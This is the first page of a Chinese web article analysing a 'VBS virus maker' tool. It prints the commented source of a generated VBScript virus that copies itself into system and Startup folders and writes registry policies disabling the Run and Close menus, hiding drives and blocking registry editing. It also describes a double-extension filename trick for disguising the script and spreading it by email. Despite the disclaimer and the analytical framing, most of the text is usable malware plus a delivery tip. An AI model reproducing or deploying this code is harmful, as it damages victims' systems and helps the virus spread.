警告：此文只是做一些技术性的分析，希望大家不要乱用，造成的任何后果本人概不负责。切记。

病毒制造机，这是网上流行的一款典型的病毒制造机（病毒制造机：顾名思义，就是制造病毒的机器（^_^废话）），用于傻瓜型手工制造vbs病毒（vbs病毒：就是Visual Basic Script即是VB脚本，一种通过Microsoft的Windows Script Host提供的一种基于32位Windows平台的、与语言无关的脚本解释机制，它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH，用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。是不是功能强大，怕怕了吧？！）。
这个软件可能是用VB编写（没有询问作者详情），调用了kernel32.dll、user32.dll和advapi32.dll三个系统动态链接库.在这里，kernel32.dll主要用于系统控制，包括进程创建，变量设置，虚拟内存管理，系统资源管理等等，是操作系统必需的库之一。user32.dll主要用于与用户交互的通信，包括messege的传递与echo等。advapi32.dll主要用于程序与系统的API接口，这里即注册表的一些操作，包括RegOpenKey（取得SubKey的Handle）,RegCloseKey（关闭打开或者建立的SubKey）,RegQueryvalueEx（读取指定Key的值）。

下面是运行这个制造机（其中提供的功能选择全选，也就是病毒荷载最“狠”化，说白了，就是所有破坏功能都选了，最毒）之后，得到的一个*.vbs脚本病毒(用各大杀毒软件均提示存在vbs.xxxxx病毒)的源代码，加上我的一些注释（改一下名字，比如xxxx.txt .vbs，这里第一和第二后缀名之间N个空格，是不是很迷惑人，以后大家注意防范这样的手段哦（也算一种社会工程吧^_^），就可以发送电子邮件或者其他的方式传播破坏了，您千万不要那样做哦，哈哈！不要做坏蛋！要做好人！）。

On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject") '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作
Set dir1=fs.GetSpecialFolder(0) '获取Windows/WinNT文件夹位置
Set dir2=fs.GetSpecialFolder(1) '获取System32/System文件夹位置
Set so=CreateObject("Scripting.FileSystemObject")
dim r '定义一个变量
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs") '复制病毒副本到Windows/WinNT文件夹位置
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs") '复制病毒副本到System32/System文件夹位置
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\启动\Win32system.vbs") '复制病毒副本到Start Menu启动菜单

'下面是对注册表的恶意修改和简单的依靠OE传播
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD" '修改注册表，禁止“运行”菜单
r.Regwrite "KCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD" '修改注册表，禁止“关闭”菜单
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD" '修改注册表，隐藏所有逻辑盘符
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD" '修改注册表，禁止注册表编辑
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry","" '修改注册表，禁止开机注册表扫描
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD" '修改注册表，禁止“注销”菜单
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD" '修改注册表，禁止MS-DOS实模式

[1] [2] [3] [4] [5] 下一页

上一篇:总结开3389的5种方法

下一篇:Linux中文件查找技术大全

VBS病毒制造机v1.0 分析报告相关文章：

·BT下载速度变慢原因解读及应对方法分析

·万能五笔2001注册码分析及暴力破解上

·静态分析技术-IDA Pro简介

·电脑死机的故障分析

·Ebook WorkShop制造电子书全攻略

VBS病毒制造机v1.0 分析报告相关软件：

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源：http://www.viphot.com

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.viphot.com All Rights Reserved.	鄂ICP备05000083号Powered by:viphot